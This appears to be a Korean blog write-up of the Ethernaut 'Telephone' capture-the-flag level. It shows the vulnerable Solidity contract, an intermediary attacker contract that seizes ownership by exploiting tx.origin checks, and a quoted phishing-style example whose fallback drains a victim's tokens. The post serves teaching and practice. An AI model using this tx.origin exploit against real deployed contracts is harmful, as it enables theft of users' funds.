반응형
문제
Claim ownership of the contract below to complete this level.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Telephone {
address public owner;
constructor() {
owner = msg.sender;
}
function changeOwner(address _owner) public {
if (tx.origin != msg.sender) {
owner = _owner;
}
}
}
문제해결
contract TelephoneSolv {
address target;
constructor(address _target){
target = _target;
}
function changeOwner(address _owner) public {
Telephone(target).changeOwner(_owner);
}
}
tx.origin : 트랜잭션을 최초로 보낸 EOA
msg.sender : 트랜잭션을 마지막으로 보낸 EOA or CA
tx.origin with msg.sender can lead to phishing-style attacks.
An example of a possible attack is outlined below.
In this scenario, tx.origin will be the victim's address (while msg.sender will be the malicious contract's address), resulting in the funds being transferred from the victim to the attacker.
function transfer(address _to, uint _value){
tokens[tx.origin] -= _value;
tokens[_to] += _value;
}
function () payable {
token.transfer(attackerAddress, 10000);
}
반응형
'blockchain' 카테고리의 다른 글
| [ethernaut] Coin Flip (0) | 2024.09.01 |
|---|---|
| [ethernaut] Fallout (0) | 2023.04.05 |
| [ethernaut] Fallback (0) | 2023.04.02 |
| [ethernaut] Hello Ethernaut (0) | 2023.04.02 |
| remix - Deploy & At Address (0) | 2023.03.18 |